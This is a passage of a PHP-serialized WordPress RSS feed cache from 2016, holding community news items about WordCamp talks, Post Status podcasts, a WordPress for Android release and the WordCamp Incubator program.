class=\"video-player\">\n</div>\n<p>When your website is accessible, all users can access your content no matter their abilities. Visually-impaired users can visit your website using a screen reader. Those who can’t use the mouse can navigate your site using a keyboard or other input device. Some accessibility features might also improve your SEO. When your site is inaccessible, research shows you could be excluding up to 20 percent of your users. This talk for all skill levels will review tools and techniques you can use to test and improve your site’s accessibility.</p>\n<p><a href=\"http://www.slideshare.net/rachelcarden/tools-and-techniques-for-evaluating-accessibility\">Presentation Slides</a></p>\n<p> </p>\n<h2>Kids WordPress Panel Discussion</h2>\n<div id=\"v-CypUoG9y-1\" class=\"video-player\">\n</div>\n<p>Kids talking about WordPress and blogging at WordCamp Miami 2016.</p>\n<p> </p>\n<p> </p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/464/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/464/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=464&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://blog.wordpress.tv/2016/06/22/spotlight-wordcamp-miami-2016/\"><img alt=\"Rachel Carden: Tools and Techniques for Evaluating Accessibility\" src=\"http://videos.videopress.com/o320Yj17/toolsandtechniquesforevaluatingaccessibility_std.original.jpg\" width=\"160\" height=\"120\" /></a></div><div><a href=\"http://blog.wordpress.tv/2016/06/22/spotlight-wordcamp-miami-2016/\"><img alt=\"Kids WordPress Panel Discussion\" src=\"http://videos.videopress.com/CypUoG9y/kidspanel_scruberthumbnail_1.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 22 Jun 2016 16:41:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WordPress.tv Blog: Developing for WordPress with Pippin Williamson and Danilo Ercoli\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=439\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"http://blog.wordpress.tv/2016/06/15/developing-for-wordpress-with-pippin-williamson-and-danilo-ercoli/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1891:\"<h2 class=\"video-title\">Pippin Williamson: Ask Me Anything About Plugins</h2>\n<p>Pippin is a prolific plugin developer and founder of several successful commercial WordPress plugin projects. This session is a Q&A style format where the audience asked question related to plugin development, the WordPress.org plugins directory, selling plugins, building a development team, and anything else related to plugins.</p>\n<p></p>\n<p>More from <a href=\"http://wordpress.tv/event/wordcamp-san-diego-2016/\">WordCamp San Diego 2016</a></p>\n<p> </p>\n<h2 class=\"video-title\">Danilo Ercoli: Migliorare le performance di WordPress con il caching e l’esecuzione differita di codice</h2>\n<p>Questo talk è rivolto sia a chi ha appena iniziato a sviluppare con WordPress, sia agli sviluppatori più esperti che lo conoscono già da parecchio tempo, ed è un’introduzione ad alcuni argomenti come il caching e l’esecuzione differita di codice PHP, che sono utili per migliorare notevolmente le performance del tuo sito. Alcuni degli argomenti trattati sono il corretto utilizzo della cache e dei plugin di caching. Un’introduzione al WordPress Jobs System, e come eseguire codice differito senza dover quindi rallentare il rendering della pagina.</p>\n<p></p>\n<p><a href=\"https://wptv.files.wordpress.com/2016/04/danilo-ercoli-migliorare-performance-wp-caching-esecuzione-differita-codice-wctrn-2016.pdf\">Presentation Slides</a></p>\n<p>More from <a href=\"http://wordpress.tv/event/wordcamp-torino-2016/\">WordCamp Torino 2016</a></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/439/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/439/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=439&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Jun 2016 16:37:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Post Status: How WordPress news happens — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=25018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://poststatus.com/wordpress-news-happens-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1557:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. This episode of Post Status Draft is hosted by Sarah Gooding — another WordPress journalist — and Brian Krogsgard.</p>\n<p><span>In this episode, Sarah and Brian discuss how they do WordPress news, manage working remotely, and handle family life.</span></p>\n<a href=\"https://audio.simplecast.com/39891.mp3\">https://audio.simplecast.com/39891.mp3</a>\n<p><a href=\"http://audio.simplecast.com/39891.mp3\">Direct Download</a></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://wptavern.com/category/opinion\">WP Tavern opinion</a></li>\n</ul>\n<h3>Sponsor</h3>\n<p><span>This episode is sponsored by <a href=\"https://www.valet.io/\">Valet</a>. Valet helps keep your clients happy & coming back. They offer expert services and keep the websites they manage functioning flawlessly. They offer preventative care that provides peace of mind around the clock. For more information, check out <a href=\"https://www.valet.io/\">their website</a> and thank you to Valet for being a Post Status partner. </span><b> </b></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Jun 2016 13:35:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WordPress.tv Blog: How to create child themes and multi-lingual blogs – Featured on WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:112:\"http://blog.wordpress.tv/2016/06/08/how-to-create-child-themes-and-multi-lingual-blogs-featured-on-wordpress-tv/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2153:\"<h2 class=\"video-title\">Corinne Welsh: My First Child Theme</h2>\n<p>Corrine Welsh explains how to get started with themes in WordPress, starting with a case study: why, why then, and why not sooner. From there she looks at the structure of a theme and walks through the steps of building a child theme. You may leave inspired to roll up your sleeves and get your hands dirty in theming after this great talk.</p>\n<div id=\"v-6oXMxwGi-1\" class=\"video-player\">\n</div>\n<p>From <a href=\"http://wordpress.tv/event/wordcamp-london-2016/\">WordCamp London 2016</a></p>\n<h2 class=\"video-title\">Maciej Pilarski: How To Make Your WordPress Website Multilingual</h2>\n<p>In this presentation Maciej Pilarski goes into detail on how to easily and quickly create a traditional multilingual website or eCommerce store. He also compares most popular multilingual plugins and also shows how this can be done without using any plugins, as well as discusses the benefits to your business of going global and how this can be done in minutes.</p>\n<div id=\"v-K21BXW6Y-1\" class=\"video-player\">\n</div>\n<p>From <a href=\"http://wordpress.tv/event/wordcamp-london-2016/\">WordCamp London 2016</a></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/414/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/414/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=414&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://blog.wordpress.tv/2016/06/08/how-to-create-child-themes-and-multi-lingual-blogs-featured-on-wordpress-tv/\"><img alt=\"Corinne Welsh: My First Child Theme\" src=\"http://videos.videopress.com/6oXMxwGi/video-b0595a6e44_std.original.jpg\" width=\"160\" height=\"120\" /></a></div><div><a href=\"http://blog.wordpress.tv/2016/06/08/how-to-create-child-themes-and-multi-lingual-blogs-featured-on-wordpress-tv/\"><img alt=\"Maciej Pilarski: How to Make your WordPress Website Multilingual\" src=\"http://videos.videopress.com/K21BXW6Y/video-c5c8665f72_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Jun 2016 01:46:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"WP Mobile Apps: WordPress for Android: Version 5.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3403\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://apps.wordpress.com/2016/06/01/wordpress-for-android-version-5-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3183:\"<p>Hello WordPress users! <a href=\"https://play.google.com/store/apps/details?id=org.wordpress.android\" target=\"_blank\">Version 5.4 of the WordPress for Android app</a> is now available in the Google Play Store.</p>\n<h1>Gravatar update</h1>\n<p>Did you just take a great selfie? You can update your Gravatar from the app on the <em>Me</em> screen. Tap your profile picture, and follow the prompts to take a new photo or pick an image from your device’s photo library.</p>\n<div id=\"v-a5lLmHSc-1\" class=\"video-player\">\n</div>\n<h1>Smart Lock for Passwords integration</h1>\n<p>Signing in with a WordPress.com account is easier than ever with Smart Lock for Passwords, the Google password manager. If you signed in to your account on your computer using Google’s Chrome browser, the username and password fields will be automatically pre-filled when you open the app — you can even manage several identities.</p>\n<p><img class=\"alignnone wp-image-3404 size-large\" src=\"https://apps.files.wordpress.com/2016/05/screenshot-2016-05-04_12-08-06-614.png?w=614&h=1024\" alt=\"screenshot-2016-05-04_12.08.06.614\" width=\"614\" height=\"1024\" /></p>\n<h1>Other Changes</h1>\n<p>Version 5.4 also comes with a few other fixes:</p>\n<ul>\n<li>Fixed comment previews with images in the Comment List screen.</li>\n<li>Fixed an issue with tag display in the Reader.</li>\n<li>Fixed a problem sometimes removed the <em>Themes</em> option after sign-in.</li>\n</ul>\n<p>You can track our development progress for the next release by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-Android/milestones/5.5\">our 5.5 milestone on GitHub</a>.</p>\n<h1>Beta</h1>\n<p>Do you like keeping up with what’s new in the app? Do you enjoy testing new stuff before anyone else? Our testers have access to beta versions with updates shipped directly through Google Play. The beta versions may have new features, new fixes — and possibly new bugs! Testers make it possible for us to improve the overall app experience, and offer us invaluable development feedback.</p>\n<p>Want to become a tester? <a href=\"https://play.google.com/apps/testing/org.wordpress.android\">Opt-in</a>!</p>\n<h1>Thank you</h1>\n<p>Thanks to our GitHub contributors: <a href=\"https://github.com/aerych\">@aerych</a>, <a href=\"https://github.com/aforcier\">@aforcier</a>, <a href=\"https://github.com/daniloercoli\">@daniloercoli</a>, <a href=\"https://github.com/hypest\">@hypest</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/maxme\">@maxme</a>, <a href=\"https://github.com/mzorz\">@mzorz</a>, <a href=\"https://github.com/nbradbury\">@nbradbury</a>, <a href=\"https://github.com/oguzkocer\">@oguzkocer</a>, <a href=\"https://github.com/roundhill\">@roundhill</a>, and <a href=\"https://github.com/tonyr59h\">@tonyr59h</a>.</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3403&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"https://apps.wordpress.com/2016/06/01/wordpress-for-android-version-5-4/\"><img alt=\"gravatar\" src=\"https://videos.files.wordpress.com/a5lLmHSc/gravatar_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 01 Jun 2016 11:53:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Maxime\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: WordCamp Incubator Program to Launch in Indonesia, Zimbabwe, and Colombia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=55034\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"http://wptavern.com/wordcamp-incubator-program-to-launch-in-indonesia-zimbabwe-and-columbia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2932:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/02/flags.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/02/flags.jpg?resize=1020%2C500\" alt=\"flags\" class=\"aligncenter size-full wp-image-16697\" /></a></p>\n<p>After receiving <a href=\"http://wptavern.com/wordcamp-incubator-program-receives-182-applications-narrows-candidates-to-16-communities\" target=\"_blank\">182 applications from cities all over the world</a>, the WordPress Community Team has selected three locations for the WordCamp Incubator program:</p>\n<ul>\n<li>Denpasar, Indonesia</li>\n<li>Harare, Zimbabwe</li>\n<li>Medellín, Colombia</li>\n</ul>\n<p>Representatives from the thirteen other short-listed locations are encouraged to organize a local WordPress meetup and will have the help of Community Team mentors as needed.</p>\n<p>Thanks to the addition of a new volunteer deputy from the Community Team, the program will move forward with three locations, instead of having to scale back to two, as previously anticipated. Each event has been assigned a deputy who will meet bi-weekly with the local team to mentor the new WordCamp organizers.</p>\n<p>Andrea Middleton outlined in the <a href=\"https://make.wordpress.org/community/2016/05/25/wordcamp-incubator-locations-announcement/\" target=\"_blank\">announcement</a> how the team plans to proceed with getting these events off the ground.</p>\n<p>“Denpasar, Harare, and Medellín will work with their respective deputies to start a monthly WordPress meetup group or add their existing meetup group to the chapter account program,” Middleton said. “Once the local WordPress user group is meeting regularly, each team will work on finding a venue, setting a date, recruiting speakers, and spreading the word about the upcoming WordCamp.”</p>\n<p>In order to take the pressure off the new organizers, the Community team will assist them in scheduling and finding speakers. The events will be 100% funded by the global sponsorship grant so organizers can focus on community building without the pressure of fundraising. Middleton said they are aiming for no more than three non-local speakers at each event, which she anticipates will happen in the last quarter of 2016.</p>\n<p>The challenge with the Incubator program is to ensure these events are a launching point and not just a flash in the pan. Middleton and the community team deputies are working to establish these emerging communities so that they continue to grow organically after the events conclude.</p>\n<p>“The goal for these events is to organize an easily reproducible, one-day, one-track event with about 50-75 attendees,” Middleton said. “Hopefully by the end of the organizing/incubating experience, members of the local community will feel confident that they can organize an annual WordCamp independently in the years to come.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 31 May 2016 05:12:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Donncha: WordPress is thirteen!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"http://z9.io/?p=89499890\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"http://z9.io/2016/05/27/wordpress-is-thirteen/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1231:\"<p>You could have knocked me over with a feather today when I read <a href=\"https://ma.tt/2016/05/wordpress-is-a-teenager/\">Matt’s post</a> announcing that WordPress was celebrating a birthday!</p>\n<p>It didn’t seem so long ago that we were working on b2++, hacking the multiuser bits in and doing all sorts of crazy things with it.</p>\n<p>Now I’m “typing” this on a mobile phone by swiping my finger across a virtual keyboard. Back then the closest to this that I could imagine would be some sort of SMS integration!</p>\n<p>WordPress today is unrecognisable from what it was back then, especially if you use the slick Calypso interface.</p>\n<p>I’m looking forward to seeing what the next few years bring.</p>\n\n<p><strong>Related Posts</strong><ul><li> <a href=\"http://z9.io/2013/08/02/like-a-dog-and-his-ball/\" rel=\"bookmark\" title=\"Permanent Link: Like a dog and his ball\">Like a dog and his ball</a></li><li> <a href=\"http://z9.io/2009/01/28/wordpress-mu-27/\" rel=\"bookmark\" title=\"Permanent Link: WordPress MU 2.7\">WordPress MU 2.7</a></li><li> <a href=\"http://z9.io/2008/09/02/wordpress-mu-261/\" rel=\"bookmark\" title=\"Permanent Link: WordPress MU 2.6.1\">WordPress MU 2.6.1</a></li></ul></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2016 22:57:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Donncha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"Post Status: WordPress.org — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24730\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://poststatus.com/wordpress-org-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3513:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p><span>In this episode, Joe and Brian discuss the structure and function of the WordPress.org website, which is the hub of the WordPress project. From the actual software distribution, to discussions about the project, to support, and buying swag: it all happens from WordPress.org. We break down what’s what and what we think you should know.</span></p>\n<p><a href=\"https://audio.simplecast.com/38479.mp3\">https://audio.simplecast.com/38479.mp3</a><br />\n<a href=\"http://audio.simplecast.com/38479.mp3\">Direct Download</a></p>\n<h3>Notes</h3>\n<p>Who owns WordPress.org?<br />\nWho works on WordPress.org<br />\nHow WordPress.org distributes software updates</p>\n<h3>Different Sections of WordPress.org Navigation</h3>\n<ul>\n<li>Showcase</li>\n<li>WordPress theme directory — and reviews — and commercial themes</li>\n<li>WordPress plugin directory — and reviews</li>\n<li>Mobile — Redirects to .com</li>\n<li>Support Forums / Codex “documentation”</li>\n<li>Make WordPress (Get Involved)</li>\n<li>About (many sub pages and also project structure)</li>\n<li>Blog</li>\n<li>Hosting</li>\n<li>Download (button — in future to be <a href=\"https://make.wordpress.org/meta/2016/02/29/get-wordpress-improving-the-path-to-wordpress/\">Get WordPress</a>)</li>\n</ul>\n<h3>Other Sections</h3>\n<ul>\n<li><a href=\"https://core.trac.wordpress.org/\">core.trac.wordpress.org</a></li>\n<li><a href=\"https://developer.wordpress.org/\">developer.wordpress.org</a></li>\n<li><a href=\"https://mercantile.wordpress.org/\">mercantile.wordpress.org</a></li>\n<li><a href=\"http://jobs.wordpress.net/\">jobs.wordpress.net</a></li>\n<li><a href=\"https://learn.wordpress.org/\">learn.wordpress.org</a></li>\n<li><a href=\"https://wordpress.org/ideas/\">Ideas</a></li>\n</ul>\n<h3>Other Linked Sites</h3>\n<ul>\n<li><a href=\"https://central.wordcamp.org/\">WordCamp</a></li>\n<li><a href=\"http://wordpress.tv/\">WordPress.tv</a></li>\n<li><a href=\"https://buddypress.org/\">BuddyPress</a></li>\n<li><a href=\"https://bbpress.org/\">bbPress</a></li>\n<li><a href=\"https://wordpress.com/\">WordPress.com</a></li>\n<li><a href=\"https://ma.tt/\">ma.tt</a></li>\n</ul>\n<h3>Active Projects for Improving</h3>\n<ul>\n<li><a href=\"https://make.wordpress.org/meta/tag/helphub/\">Helphub</a></li>\n<li>Handbooks 